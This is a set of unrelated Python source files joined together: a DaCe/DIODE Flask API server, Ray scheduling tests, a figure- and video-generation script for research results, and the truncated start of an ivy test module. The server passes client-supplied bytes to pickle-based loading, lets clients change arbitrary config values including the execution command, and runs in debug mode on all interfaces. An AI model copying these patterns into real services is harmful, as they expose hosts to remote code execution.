ret = es.waitForCommand(ticket)
print("Got the ticket, we're done!")
# jsonify creates a response directly, so we load string => obj first
return jsonify(json.loads(ret))
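# Example (sketch): filtering analysis results through the perfdata route above.
# Assumes http://localhost:5000 and the `requests` package; the client id and the
# filter value are placeholders. Omitted for_* keys match anything.
def _example_perfdata_query():
    import requests
    resp = requests.post(
        "http://localhost:5000/dace/api/v1.0/perfdata/get/",
        json={
            "client_id": "example-client",
            "for_program": 0,
        })
    return resp.json()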
@app.route("/dace/api/v1.0/dispatcher/<string:op>/", methods=['POST'])
def execution_queue_query(op):
es = es_ref[0]
if op == "list":
# List the currently waiting tasks
retlist = []
for key, val in es._orphaned_runs.items():
tmp = [''.join(x) for x in val]
for x in tmp:
d = {}
d['index'] = '(done)'
d['type'] = 'orphan'
d['client_id'] = key
d['state'] = 'orphaned'
d['output'] = str(x)
retlist.append(d)
for key, val in es._task_dict.items():
d = {}
if val['cmd'] == 'run':
d['index'] = key
d['type'] = 'run'
d['client_id'] = val['cid']
d['options'] = val['opt']
d['state'] = val['state']
elif val['cmd'] == 'control':
d['index'] = key
d['type'] = 'command'
d['client_id'] = val['cid']
d['options'] = val['operation']
d['state'] = val['state']
retlist.append(d)
ret = {}
ret['elements'] = retlist
return jsonify(ret)
else:
print("Error: op " + str(op) + " not implemented")
abort(400)
@app.route('/dace/api/v1.0/run/status/', methods=['POST'])
def get_run_status():
if not request.json or not 'client_id' in request.json:
print("[Error] No client id provided, cannot continue")
abort(400)
es = es_ref[0]
# getExecutionOutput returns a generator to output to a HTTP1.1 stream
outputgen = es.getExecutionOutput(request.json['client_id'])
return Response(outputgen(), mimetype='text/text')
@app.route('/dace/api/v1.0/run/', methods=['POST'])
def run():
"""
This function is equivalent to the old DIODE "Run"-Button.
POST-Parameters:
(Same as for compile(), language defaults to 'dace')
perfmodes: list including every queried mode
corecounts: list of core counts (one run for every number of cores)
"""
try:
perfmodes = request.json['perfmodes']
except:
perfmodes = ["noperf"]
try:
corecounts = request.json['corecounts']
except:
corecounts = [0]
try:
repetitions = request.json['repetitions']
except:
repetitions = 1
# Obtain the reference
es = es_ref[0]
client_id = request.json['client_id']
es.addRun(client_id, "start", {})
for pmode in perfmodes:
perfopts = {
'mode': pmode,
'core_counts': corecounts,
'repetitions': repetitions
}
tmp = compileProgram(request, 'dace', perfopts)
if len(tmp) > 1:
sdfgs, code_tuples, dace_state = tmp
else:
# ERROR
print("An error occurred")
abort(400)
dace_state.repetitions = repetitions
more_options = {}
more_options['perfopts'] = perfopts
runner = es.addRun(client_id, (sdfgs, code_tuples, dace_state),
more_options)
es.addRun(client_id, "end", {})
# There is no state information with this, just the output
# It might be necessary to add a special field that the client has to filter out
# to provide additional state information
return Response(runner(), mimetype="text/text")
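# Example (sketch): triggering a run and streaming its terminal output. Assumes
# http://localhost:5000 and the `requests` package; the code payload and client id
# are placeholders.
def _example_run_request():
    import requests
    resp = requests.post(
        "http://localhost:5000/dace/api/v1.0/run/",
        json={
            "code": ["# DaCe program source goes here"],
            "client_id": "example-client",
            "perfmodes": ["noperf"],
            "corecounts": [0],
        },
        stream=True)
    # The response body is an HTTP/1.1 stream of the program output.
    for chunk in resp.iter_content(chunk_size=None, decode_unicode=True):
        print(chunk, end="")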
@app.route('/dace/api/v1.0/match_optimizer_patterns/', methods=['POST'])
def optimize():
"""
Returns a list of possible optimizations (transformations) and their properties.
POST-Parameters:
input_code: list. Contains all necessary input code files
[opt] optpath: list of dicts, as { name: <str>, params: <dict> }. Contains the current optimization path/tree.
This optpath is applied to the provided code before evaluating possible pattern matches.
client_id: <string>: For later identification. May be unique across all runs,
must be unique across clients
Returns:
matching_opts: list of dicts, as { opt_name: <str>, opt_params: <dict>, affects: <list>, children: <recurse> }.
Contains the matching transformations.
`affects` is a list of affected node ids, which must be unique in the current program.
"""
tmp = compileProgram(request, 'dace')
if len(tmp) > 1:
sdfgs, code_tuples, dace_state = tmp
else:
# Error
return jsonify({'error': tmp})
opt_per_sdfg = get_transformations(sdfgs)
return jsonify(opt_per_sdfg)
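# Example (sketch): asking for matching transformations of a program. Assumes
# http://localhost:5000 and the `requests` package; code and client id are
# placeholders. The reply maps each SDFG name to its matching_opts list.
def _example_match_patterns():
    import requests
    resp = requests.post(
        "http://localhost:5000/dace/api/v1.0/match_optimizer_patterns/",
        json={"code": ["# DaCe program source"], "client_id": "example-client"})
    return resp.json()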
@app.route('/dace/api/v1.0/compile/<string:language>', methods=['POST'])
def compile(language):
"""
POST-Parameters:
sdfg: ser. sdfg: Contains the root SDFG, serialized in JSON-string. If set, options `code` and `sdfg_props` are taken from this value.
Can be a list of SDFGs.
            NOTE: If specified, `code`, `sdfg_props`, and `language` (in URL) are ignored.
code: string/list. Contains all necessary input code files
[opt] optpath: list of dicts, as { <sdfg_name/str>: { name: <str>, params: <dict> }}. Contains the current optimization path/tree.
This optpath is applied to the provided code before compilation
[opt] sdfg_props: list of dicts, as { <sdfg_name/str>: { state_id: <str>, node_id: <str>, params: <dict>, step: <opt int>}}. Contains changes to the default SDFG properties.
The step element of the dicts is optional. If it is provided, it specifies the number
            of optpath elements that precede it. E.g. a step value of 0 means that the property is applied before the first optimization.
If it is omitted, the property is applied after all optimization steps, i.e. to the resulting SDFG
[opt] perf_mode: string. Providing "null" has the same effect as omission. If specified, enables performance instrumentation with the counter set
provided in the DaCe settings. If null (or omitted), no instrumentation is enabled.
client_id: <string>: For later identification. May be unique across all runs,
must be unique across clients
Returns:
sdfg: object. Contains a serialization of the resulting SDFGs.
generated_code: string. Contains the output code
sdfg_props: object. Contains a dict of all properties for
every existing node of the sdfgs returned
in the sdfg field
"""
tmp = None
try:
tmp = compileProgram(request, language)
if len(tmp) > 1:
sdfgs, code_tuples, dace_state = tmp
else:
# Error
return jsonify({'error': tmp})
opts = get_transformations(sdfgs)
compounds = {}
for n, s in sdfgs.items():
compounds[n] = {
"sdfg": s.to_json(),
"matching_opts": opts[n]['matching_opts'],
"generated_code": [*map(lambda x: x.code, code_tuples[n])]
}
return jsonify({"compounds": compounds})
except Exception as e:
return jsonify({'error': str(e), 'traceback': traceback.format_exc()})
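# Example (sketch): compiling a program and inspecting the generated code. Assumes
# http://localhost:5000 and the `requests` package; inputs are placeholders.
def _example_compile_request():
    import requests
    resp = requests.post(
        "http://localhost:5000/dace/api/v1.0/compile/dace",
        json={"code": ["# DaCe program source"], "client_id": "example-client"})
    compounds = resp.json().get("compounds", {})
    for name, data in compounds.items():
        print(name, "->", len(data["generated_code"]), "generated code file(s)")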
@app.route('/dace/api/v1.0/decompile/<string:obj>/', methods=['POST'])
def decompile(obj):
"""
De-compiles (pickles) an SDFG in python binary format.
POST-Parameters:
binary: base64 string. The object to pickle (the URL encodes the expected type).
"""
import base64, pickle
try:
b64_data = request.json['binary']
decoded = base64.decodebytes(b64_data.encode())
except:
abort(Response("Invalid input", 400))
if obj == "SDFG":
loaded_sdfg = ""
from dace.sdfg import SDFG
try:
loaded_sdfg = SDFG.from_bytes(decoded)
except:
abort(Response("The provided file is not a valid SDFG", 400))
# With the SDFG decoded, we must adhere to the output format of compile() for the best interoperability
sdfg_name = loaded_sdfg.name
opts = get_transformations({sdfg_name: loaded_sdfg})
from dace.codegen import codegen
gen_code = codegen.generate_code(loaded_sdfg)
return jsonify({
"compounds": {
sdfg_name: {
'input_code': loaded_sdfg.sourcecode,
'sdfg': json.dumps(loaded_sdfg.to_json()),
'matching_opts': opts[sdfg_name]['matching_opts'],
'generated_code': [*map(lambda x: x.code, gen_code)]
}
}
})
else:
print("Invalid object type '" + obj + "' specified for decompilation")
abort(400)
@app.route('/dace/api/v1.0/diode/themes', methods=['GET'])
def get_available_ace_editor_themes():
import glob, os.path
path = "./client/external_lib/ace/"
files = [f for f in glob.glob(path + "theme-*.js")]
filenames = map(os.path.basename, files)
return jsonify([*filenames])
def get_settings(client_id, name="", cv=None, config_path=""):
from dace.config import Config
if cv is None:
clientpath = "./client_configs/" + client_id + ".conf"
if os.path.isfile(clientpath):
Config.load(clientpath)
else:
Config.load()
if cv is None:
cv = Config.get()
ret = {}
for i, (cname, cval) in enumerate(sorted(cv.items())):
cpath = tuple(list(config_path) + [cname])
try:
meta = Config.get_metadata(*cpath)
# A dict contains more elements
if meta['type'] == 'dict':
ret[cname] = {
"value": get_settings(client_id, cname, cval, cpath),
"meta": meta
}
continue
# Other values can be included directly
ret[cname] = {"value": cval, "meta": meta}
except KeyError:
print('WARNING: No metadata for configuration key', cpath)
return ret
def set_settings(settings_array, client_id):
from dace.config import Config
if not os.path.isdir("./client_configs"):
os.mkdir("./client_configs/")
clientpath = "./client_configs/" + client_id + ".conf"
if os.path.isfile(clientpath):
Config.load(clientpath)
else:
Config.load()
for path, val in settings_array.items():
path = path.split("/")
Config.set(*path, value=val)
Config.save(clientpath)
@app.route('/dace/api/v1.0/preferences/<string:operation>', methods=['POST'])
def diode_settings(operation):
if operation == "get":
client_id = request.json['client_id']
return jsonify(get_settings(client_id))
elif operation == "set":
print("request.data: " + str(request.data))
settings = request.json
client_id = settings['client_id']
del settings['client_id']
return jsonify(set_settings(settings, client_id))
else:
return jsonify({"error": "Unsupported operation"})
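# Example (sketch): reading and updating preferences through the route above. Assumes
# http://localhost:5000 and the `requests` package; "compiler/use_cache" only
# illustrates the "category/key" path form expected by set_settings().
def _example_preferences_roundtrip():
    import requests
    base = "http://localhost:5000/dace/api/v1.0/preferences/"
    current = requests.post(base + "get", json={"client_id": "example-client"}).json()
    requests.post(base + "set", json={
        "client_id": "example-client",
        "compiler/use_cache": True,
    })
    return current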
@app.route('/dace/api/v1.0/status', methods=['POST'])
def status():
# just a kind of ping/pong to see if the server is running
return "OK"
if __name__ == '__main__':
import argparse
parser = argparse.ArgumentParser()
parser.add_argument(
"-l",
"--localhost",
action="store_true",
help="Bind to localhost only")
parser.add_argument(
"-ld",
"--localdace",
action="store_true",
help="Use local commands instead of ssh")
parser.add_argument(
"-rd",
"--restoredace",
action="store_true",
help="Restore the backup file")
parser.add_argument("-p", "--port", type=int, help="Port to listen on")
args = parser.parse_args()
if args.restoredace:
from dace.config import Config
Config.load("./dace.conf.bak")
Config.save()
if args.localdace:
from dace.config import Config
Config.load()
Config.save("./dace.conf.bak")
Config.load()
Config.set(
"execution",
"general",
"execcmd",
value='${command}',
autosave=True)
Config.set(
"execution",
"general",
"copycmd_r2l",
value='cp ${srcfile} ${dstfile}',
autosave=True)
Config.set(
"execution",
"general",
"copycmd_l2r",
value='cp ${srcfile} ${dstfile}',
autosave=True)
if not os.path.isdir("./client_configs"):
os.mkdir("./client_configs")
Config.save("./client_configs/default.conf")
es = ExecutorServer()
es_ref.append(es)
app.run(
host='localhost' if args.localhost else "0.0.0.0",
debug=True,
port=args.port,
use_reloader=False)
es.stop()
else:
# Start the executor server
es = ExecutorServer()
es_ref.append(es)
import atexit
def tmp():
es.stop()
atexit.register(tmp)
|
test_basic_4.py
|
# coding: utf-8
import logging
import sys
import time
import subprocess
import numpy as np
import pytest
import ray.cluster_utils
from ray._private.gcs_pubsub import gcs_pubsub_enabled, GcsFunctionKeySubscriber
from ray._private.test_utils import wait_for_condition
from ray.autoscaler._private.constants import RAY_PROCESSES
from pathlib import Path
import ray
import psutil
logger = logging.getLogger(__name__)
def test_actor_scheduling(shutdown_only):
ray.init()
@ray.remote
class A:
def run_fail(self):
ray.actor.exit_actor()
def get(self):
return 1
a = A.remote()
a.run_fail.remote()
with pytest.raises(Exception):
ray.get([a.get.remote()])
def test_worker_startup_count(ray_start_cluster):
    """Test that no extra workers are started when there are no available cpu
    resources in the cluster."""
cluster = ray_start_cluster
# Cluster total cpu resources is 4.
cluster.add_node(
num_cpus=4,
_system_config={
"debug_dump_period_milliseconds": 100,
},
)
ray.init(address=cluster.address)
# A slow function never returns. It will hold cpu resources all the way.
@ray.remote
def slow_function():
while True:
time.sleep(1000)
# Flood a large scale lease worker requests.
for i in range(10000):
# Use random cpu resources to make sure that all tasks are sent
# to the raylet. Because core worker will cache tasks with the
# same resource shape.
num_cpus = 0.24 + np.random.uniform(0, 0.01)
slow_function.options(num_cpus=num_cpus).remote()
# Check "debug_state.txt" to ensure no extra workers were started.
session_dir = ray.worker.global_worker.node.address_info["session_dir"]
session_path = Path(session_dir)
debug_state_path = session_path / "logs" / "debug_state.txt"
def get_num_workers():
with open(debug_state_path) as f:
for line in f.readlines():
num_workers_prefix = "- num PYTHON workers: "
if num_workers_prefix in line:
num_workers = int(line[len(num_workers_prefix) :])
return num_workers
return None
# Wait for "debug_state.txt" to be updated to reflect the started worker.
timeout_limit = 15
start = time.time()
wait_for_condition(lambda: get_num_workers() == 16, timeout=timeout_limit)
time_waited = time.time() - start
print(f"Waited {time_waited} for debug_state.txt to be updated")
# Check that no more workers started for a while.
for i in range(100):
# Sometimes the debug state file can be empty. Retry if needed.
for _ in range(3):
num = get_num_workers()
if num is None:
print("Retrying parse debug_state.txt")
time.sleep(0.05)
else:
break
assert num == 16
time.sleep(0.1)
def test_function_unique_export(ray_start_regular):
@ray.remote
def f():
pass
@ray.remote
def g():
ray.get(f.remote())
if gcs_pubsub_enabled():
subscriber = GcsFunctionKeySubscriber(
address=ray.worker.global_worker.gcs_client.address
)
subscriber.subscribe()
ray.get(g.remote())
# Poll pubsub channel for messages generated from running task g().
num_exports = 0
while True:
key = subscriber.poll(timeout=1)
if key is None:
break
else:
num_exports += 1
print(f"num_exports after running g(): {num_exports}")
ray.get([g.remote() for _ in range(5)])
key = subscriber.poll(timeout=1)
assert key is None, f"Unexpected function key export: {key}"
else:
ray.get(g.remote())
num_exports = ray.worker.global_worker.redis_client.llen("Exports")
ray.get([g.remote() for _ in range(5)])
assert ray.worker.global_worker.redis_client.llen("Exports") == num_exports
@pytest.mark.skipif(
sys.platform not in ["win32", "darwin"],
reason="Only listen on localhost by default on mac and windows.",
)
@pytest.mark.parametrize("start_ray", ["ray_start_regular", "call_ray_start"])
def test_listen_on_localhost(start_ray, request):
"""All ray processes should listen on localhost by default
on mac and windows to prevent security popups.
"""
request.getfixturevalue(start_ray)
process_infos = []
for proc in psutil.process_iter(["name", "cmdline"]):
try:
process_infos.append((proc, proc.name(), proc.cmdline()))
except psutil.Error:
pass
for keyword, filter_by_cmd in RAY_PROCESSES:
for candidate in process_infos:
proc, proc_cmd, proc_cmdline = candidate
corpus = (
proc_cmd if filter_by_cmd else subprocess.list2cmdline(proc_cmdline)
)
if keyword not in corpus:
continue
for connection in proc.connections():
if connection.status != psutil.CONN_LISTEN:
continue
# ip can be 127.0.0.1 or ::127.0.0.1
assert "127.0.0.1" in connection.laddr.ip
def test_job_id_consistency(ray_start_regular):
@ray.remote
def foo():
return "bar"
@ray.remote
class Foo:
def ping(self):
return "pong"
@ray.remote
def verify_job_id(job_id, new_thread):
def verify():
current_task_id = ray.runtime_context.get_runtime_context().task_id
assert job_id == current_task_id.job_id()
obj1 = foo.remote()
assert job_id == obj1.job_id()
obj2 = ray.put(1)
assert job_id == obj2.job_id()
a = Foo.remote()
assert job_id == a._actor_id.job_id
obj3 = a.ping.remote()
assert job_id == obj3.job_id()
if not new_thread:
verify()
else:
exc = []
def run():
try:
verify()
except BaseException as e:
exc.append(e)
import threading
t = threading.Thread(target=run)
t.start()
t.join()
if len(exc) > 0:
raise exc[0]
job_id = ray.runtime_context.get_runtime_context().job_id
ray.get(verify_job_id.remote(job_id, False))
ray.get(verify_job_id.remote(job_id, True))
def test_fair_queueing(shutdown_only):
ray.init(
num_cpus=1,
_system_config={
# Having parallel leases is slow in this case
# because tasks are scheduled FIFO,
            # the more parallelism we have,
# the more workers we need to start to execute f and g tasks
# before we can execute the first h task.
"max_pending_lease_requests_per_scheduling_category": 1,
"worker_cap_enabled": True,
},
)
@ray.remote
def h():
return 0
@ray.remote
def g():
return ray.get(h.remote())
@ray.remote
def f():
return ray.get(g.remote())
# This will never finish without fair queueing of {f, g, h}:
# https://github.com/ray-project/ray/issues/3644
timeout = 60.0
ready, _ = ray.wait(
[f.remote() for _ in range(1000)], timeout=timeout, num_returns=1000
)
assert len(ready) == 1000, len(ready)
if __name__ == "__main__":
sys.exit(pytest.main(["-v", __file__]))
|
supplemental.py
|
"""Generates additional figures and videos.
Usage:
python -m src.analysis.supplemental COMMAND
"""
import functools
import os
import shutil
from multiprocessing import Process
from pathlib import Path
import fire
import matplotlib as mpl
import matplotlib.pyplot as plt
import numpy as np
from loguru import logger
from slugify import slugify
from src.analysis import rollout
from src.analysis.figures import load_manifest
from src.analysis.heatmap import plot_generation_on_axis
from src.analysis.utils import load_archive_gen, load_experiment, load_metrics
from src.mpl_styles.utils import mpl_style_file
from src.objectives import ANALYSIS_INFO, get_analysis_id
def agent_videos(manifest: str, output: str, clear: bool = False):
"""Generates agent videos for supplemental material.
Also includes a README in the output directory.
Requires a manifest which looks like this:
Agent Videos:
entries:
- name: XXXX # Videos are saved in output/{slugify(name)}.mp4
logdir: XXXX # See rollout.py for these args.
mode: XXXX
query: XXXX
Note this manifest can be included in the same document as the one for
figures.py since they use different objects ("Paper" and "Agent Videos").
Args:
output: Root directory to place output videos.
manifest: Path to manifest file.
clear: Pass this to clear existing output before generating the videos.
"""
output = Path(output)
readme = output / "README.md"
if clear:
logger.info("Clearing existing output: {}", output)
shutil.rmtree(output, ignore_errors=True)
output.mkdir()
with readme.open("w") as file:
file.write("""\
# Videos
| File | Name | Objective | Measures | Archive Objective | Archive Measures |
| :--- | :--- | --------: | -------: | ----------------: | ---------------: |
""")
output.mkdir(exist_ok=True)
logger.info("Generating videos")
video_data, root_dir = load_manifest(manifest, "Agent Videos")
for entry in video_data["entries"]:
def generate_video():
"""Generates the video.
There seem to be issues with pyvirtualdisplay if we re-run
rollout.main in the same process, but putting it in a separate
process via this method seems to work.
"""
            # pylint flags `entry` as a cell-var-from-loop; capturing it here is intentional.
# pylint: disable = cell-var-from-loop
logger.info("Entry: \n{}", entry)
video_name = slugify(entry["name"])
video_output = output / video_name
rollout.main(
logdir=root_dir / entry["logdir"],
mode=entry["mode"],
query=entry["query"] if "query" in entry else None,
delete_frames=True,
video_output=video_output,
)
logger.info("Removing video output and saving mp4")
(video_output / "eval_0/video.mp4").rename(output /
f"{video_name}.mp4")
logger.info("Writing to README")
with (video_output / "eval_0/info.md").open("r") as file:
info = {
key: val[1:-1] for key, val in
[token.split(": ") for token in file.read().split("; ")]
}
with readme.open("a") as file:
file.write(
f"| `{video_name}.mp4` | {entry['name']} "
f"| {info['Objective']} | {info['BCs']} "
f"| {info['Archive Objective']} | {info['Archive BCs']} |\n"
)
logger.info("Removing the video directory.")
shutil.rmtree(video_output)
p = Process(target=generate_video)
p.start()
p.join()
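# A minimal sketch of one entry under the "Agent Videos" manifest object, based
# on the keys that `agent_videos` reads above. The values are hypothetical and
# purely illustrative; see rollout.py for the real mode/query options.
def _example_agent_videos_entry():
    """Returns an illustrative entry as consumed by `agent_videos`."""
    return {
        "name": "Example Agent",       # slugify(name) becomes the .mp4 filename
        "logdir": "logs/example_run",  # resolved relative to the manifest root
        "mode": "best",                # hypothetical; forwarded to rollout.main
        "query": None,                 # optional; missing entries default to None
    }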
def visualize_env_archives(mode,
root_dir,
viz_data,
env,
cur_subfig,
custom_gen=None):
"""Plots visualizations for one environment in viz_data.
cur_subfig may be either a subfigure or a regular figure.
Pass custom_gen to plot generations that are not the last generation. In
this case, custom_gen must be a dict mapping from algorithm name to the
generation for that algorithm.
"""
ncols = len(viz_data[env]["Algorithms"])
ax = cur_subfig.subplots(
1,
ncols,
gridspec_kw={"wspace": {
"heatmap": 0.03,
"histogram": 0.3,
}[mode]},
)
for col, (cur_ax, algo) in enumerate(zip(ax, viz_data[env]["Algorithms"])):
logdir = load_experiment(root_dir /
viz_data[env]["Algorithms"][algo]["logdir"])
analysis_id = get_analysis_id()
gen = (load_metrics(logdir).total_itrs
if custom_gen is None else custom_gen[algo])
cur_ax.set_title(algo)
if mode == "heatmap":
# See heatmap.py for these settings.
plot_generation_on_axis(
ax=cur_ax,
mode="single",
logdir=logdir,
analysis_id=analysis_id,
gen=gen,
plot_kwargs={
"square": True,
"cmap": "viridis",
"pcm_kwargs": {
"rasterized": True,
},
"vmin": ANALYSIS_INFO[analysis_id]["min_score"],
"vmax": ANALYSIS_INFO[analysis_id]["max_score"],
},
)
cur_ax.set_xticks([0.0, 0.5, 1.0])
cur_ax.set_yticks([0.0, 0.5, 1.0])
if col == 0:
# Set y label on left plot.
cur_ax.set_ylabel(viz_data[env]["ylabel"])
if col == ncols // 2:
# Set x label on middle plot.
cur_ax.set_xlabel(viz_data[env]["xlabel"])
if col == ncols - 1:
# Add colorbar when on last plot in column.
# Remove all current colorbars.
for a in cur_subfig.axes:
if a.get_label() == "<colorbar>":
a.remove()
# Retrieve the heatmap mesh.
artist = None
for child in cur_ax.get_children():
if isinstance(child, mpl.collections.QuadMesh):
artist = child
# Add axes for the colorbar. Solutions for this are complicated:
# https://stackoverflow.com/questions/18195758/set-matplotlib-colorbar-size-to-match-graph
ratio = cur_ax.get_position().width / 0.129638671875
# The axis width is expressed as a fraction of the figure width.
                # We first measured the axis width in the 5-column case, which
                # was 0.129638671875, and we now express the width as a ratio
                # of the current axis width to that baseline.
cax = cur_subfig.add_axes([
cur_ax.get_position().x1 + 0.02 * ratio,
cur_ax.get_position().y0,
0.02 * ratio,
cur_ax.get_position().height,
])
# Create colorbar.
cur_subfig.colorbar(artist, cax=cax)
elif mode == "histogram":
archive = load_archive_gen(logdir, gen)
min_score, max_score = (
ANALYSIS_INFO[analysis_id]["min_score"],
ANALYSIS_INFO[analysis_id]["max_score"],
)
# We cut off the histogram at the min score because the min score is
# known, but we increase the max score a bit to show solutions which
# exceed the reward threshold.
bin_counts, bins, patches = cur_ax.hist( # pylint: disable = unused-variable
archive.as_pandas().batch_objectives(),
range=(min_score, max_score + 400),
bins=100,
)
# Rough estimate of max items in a bin.
cur_ax.set_ylim(top=150)
# Force ticks, as there are no ticks when the plot is empty.
cur_ax.set_yticks([0, 50, 100, 150])
# Alternative - logarithmic scale (harder to understand).
# cur_ax.set_yscale("log")
# cur_ax.set_ylim(top=1000)
# Set axis grid to show up behind the histogram.
# https://stackoverflow.com/questions/1726391/matplotlib-draw-grid-lines-behind-other-graph-elements
cur_ax.set_axisbelow(True)
# Set up grid lines on y-axis. Style copied from simple.mplstyle.
cur_ax.grid(color="0.9", linestyle="-", linewidth=0.3, axis="y")
# Color the histogram with viridis.
# https://stackoverflow.com/questions/51347451/how-to-fill-histogram-with-color-gradient-where-a-fixed-point-represents-the-mid
bin_centers = 0.5 * (bins[:-1] + bins[1:])
maxi = np.abs(bin_centers).max()
norm = plt.Normalize(-maxi, maxi)
cm = plt.cm.get_cmap("viridis")
for c, p in zip(bin_centers, patches):
# Also rasterize so we do not see "white lines" between bars.
p.set(facecolor=cm(norm(c)), rasterized=True)
# Hide spines.
for pos in ['right', 'top', 'left']:
cur_ax.spines[pos].set_visible(False)
if col == ncols // 2:
# Set x label on middle plot.
cur_ax.set_xlabel("Objective")
# Adjust position of plots -- somehow, we need to adjust it on every
# iteration rather than just adjusting it once at the end. `left` and
# `right` are tuned for the 5 column case -- they come out to 0.065 and
# 0.95 for 5 columns.
left = 0.065 * 5 / ncols
right = 1 - 0.05 * 5 / ncols
if mode == "heatmap":
cur_subfig.subplots_adjust(left=left, bottom=0.08, right=right)
elif mode == "histogram":
cur_subfig.subplots_adjust(left=left,
bottom=0.25,
right=right,
top=0.7)
# Add suptitle at center of plots.
center_x = (ax[0].get_position().x0 + ax[-1].get_position().x1) / 2
cur_subfig.suptitle(env, x=center_x, y=0.95)
# Figure sizes for one row of archive visualizations (e.g. heatmaps).
ARCHIVE_FIG_WIDTH = 1.2
ARCHIVE_FIG_HEIGHT = 1.45
def visualize_archives(manifest: str,
output: str = None,
custom_gen=None,
mode: str = "heatmap",
video: bool = False):
"""Generates archive visualizations for appendix.
Requires a manifest which looks like this:
Archive Visualization:
Environment 1:
heatmap: True/False # Whether to plot heatmap in this environment
# (not all environments support heatmaps).
xlabel: "XXX" # Label for x-axis.
ylabel: "XXX" # Label for y-axis.
# Algorithms are assumed to be the same across all environments.
Algorithms:
Name 1:
logdir: XXXX
Name 2:
logdir: XXXX
...
Environment 2:
heatmap: ...
xlabel: ...
ylabel: ...
Algorithms:
...
...
Note this manifest can be included in the same document as the one for
figures.py and for `agent_videos`.
Args:
manifest: Path to manifest file.
output: Output file for figure. Defaults to `{mode}_figure.pdf`.
custom_gen: See `visualize_env_archives`.
mode: Either "heatmap" or "histogram".
video: Whether this function is being called as part of video
generation. This induces a few special settings.
"""
assert mode in ["heatmap", "histogram"], \
f"Invalid mode {mode}"
output = f"{mode}_figure.pdf" if output is None else output
output = Path(output)
logger.info("Loading manifest")
viz_data, root_dir = load_manifest(manifest, "Archive Visualization")
if mode == "heatmap":
# Only keep environments that support heatmap.
viz_data = {
key: val
for key, val in viz_data.items()
if val.get("heatmap", False)
}
n_algos = len(next(iter(viz_data.values()))["Algorithms"])
fig = plt.figure(figsize=(ARCHIVE_FIG_WIDTH * n_algos,
ARCHIVE_FIG_HEIGHT * len(viz_data)))
subfigs = fig.subfigures(
len(viz_data),
1,
wspace=0,
hspace=0,
squeeze=False,
).ravel()
logger.info("Plotting visualizations")
with mpl_style_file("archive_visualization.mplstyle") as f:
with plt.style.context(f):
if video:
logger.info("Using video mode")
for cur_subfig, env in zip(subfigs, viz_data):
visualize_env_archives(
mode,
root_dir,
viz_data,
env,
cur_subfig,
custom_gen,
)
# The colorbar is giving trouble, so tight_layout does not work,
# and bbox_inches="tight" does not work either as it seems to cut
# things off despite this:
# https://stackoverflow.com/questions/35393863/matplotlib-error-figure-includes-axes-that-are-not-compatible-with-tight-layou
# Hence, we manually rearrange everything e.g. with subplots_adjust.
fig.savefig(output, dpi=600 if video else 300)
plt.close(fig)
logger.info("Done")
heatmap_figure = functools.partial(visualize_archives,
mode="heatmap",
video=False)
histogram_figure = functools.partial(visualize_archives,
mode="histogram",
video=False)
def visualize_archives_video(manifest: str,
output: str = None,
frames: int = 250,
framerate: int = 20,
delete_frames: bool = False,
skip_frames: bool = False,
mode: str = "heatmap"):
"""Generates videos of archive visualizations.
Uses same manifest as `visualize_archives`.
Note: This method is inefficient because it calls `visualize_archives` for
each frame, so it repeatedly reloads the manifest, logging directories, and
archive histories.
Args:
manifest: Path to manifest file.
output: Output name. The video is saved to "{output}.mp4", and frames
are saved to "{output}/". Defaults to "{mode}_video".
frames: Number of frames to include in video.
framerate: FPS for video.
delete_frames: Whether to delete frames once video is assembled.
        skip_frames: Skip plotting the frames and just make the video from
            existing frames.
        mode: Either "heatmap" or "histogram".
"""
output = f"{mode}_video" if output is None else output
frame_dir = Path(f"{output}/")
if not skip_frames:
logger.info("Removing existing frames")
shutil.rmtree(output, ignore_errors=True)
frame_dir.mkdir()
logger.info("Determining frequency for each algorithm")
freq = {}
viz_data, root_dir = load_manifest(manifest, "Archive Visualization")
for env in viz_data:
algo_data = viz_data[env]["Algorithms"]
for algo in algo_data:
logdir = load_experiment(root_dir / algo_data[algo]["logdir"])
total_itrs = load_metrics(logdir).total_itrs
if total_itrs % frames != 0:
raise RuntimeError(
f"Number of generations ({total_itrs}) "
f"for {algo} "
f"must be divisible by `frames` ({frames})")
freq[algo] = total_itrs // frames
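    # Worked example (numbers are illustrative): if an algorithm ran for 10000
    # generations and frames=250, then freq[algo] == 40, so frame i below is
    # rendered with custom_gen[algo] == 40 * i, and the final frame
    # (i == frames) shows the last generation.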
logger.info("Plotting frames")
for i in range(frames + 1):
logger.info("Frame {}", i)
visualize_archives(
manifest,
frame_dir / f"{i:08d}.png",
custom_gen={algo: i * f for algo, f in freq.items()},
mode=mode,
video=True,
)
logger.info("Assembling video with ffmpeg")
video_output = Path(f"{output}.mp4")
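    # ffmpeg flags: -an drops any audio stream, -r sets the frame rate, -i takes
    # the frame pattern, and libx264 + yuv420p + the baseline profile keep the
    # resulting mp4 widely playable; -y overwrites an existing output file.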
os.system(f"""\
ffmpeg -an -r {framerate} -i "{frame_dir / '%*.png'}" \
-vcodec libx264 \
-pix_fmt yuv420p \
-profile:v baseline \
-level 3 \
"{video_output}" \
-y \
""")
if delete_frames:
logger.info("Deleting frames")
shutil.rmtree(frame_dir)
logger.info("Done")
heatmap_video = functools.partial(visualize_archives_video, mode="heatmap")
histogram_video = functools.partial(visualize_archives_video, mode="histogram")
if __name__ == "__main__":
fire.Fire({
"agent_videos": agent_videos,
"heatmap_figure": heatmap_figure,
"heatmap_video": heatmap_video,
"histogram_figure": histogram_figure,
"histogram_video": histogram_video,
})
|
test_general.py
|
"""
Collection of tests for unified general functions
"""
# global
import os
import math
import time
import einops
import pytest
import threading
import numpy as np
from numbers import Number
from collections.abc import Sequence
import torch.multiprocessing as multiprocessing
# local
import ivy
import ivy.functional.backends.numpy
import ivy.functional.backends.jax
import ivy.functional.backends.tensorflow
import ivy.functional.backends.torch
import ivy.functional.backends.mxnet
import ivy_tests.test_ivy.helpers as helpers
# Helpers #
# --------#
def _get_shape_of_list(lst, shape=()):
if not lst:
return []
if not isinstance(lst, Sequence):
return shape
if isinstance(lst[0], Sequence):
l = len(lst[0])
if not all(len(item) == l for item in lst):
msg = 'not all lists have the same length'
raise ValueError(msg)
shape += (len(lst),)
shape = _get_shape_of_list(lst[0], shape)
return shape
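# Illustrative behaviour of the helper above, worked out from its logic:
#   _get_shape_of_list([[1., 2.]])        -> (1, 2)
#   _get_shape_of_list([])                -> []
#   _get_shape_of_list([[1., 2.], [3.]])  raises ValueError (ragged inner lists)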
# Tests #
# ------#
# set_framework
@pytest.mark.parametrize(
"fw_str", ['numpy', 'jax', 'torch', 'mxnet'])
def test_set_framework(fw_str, dev, call):
ivy.set_framework(fw_str)
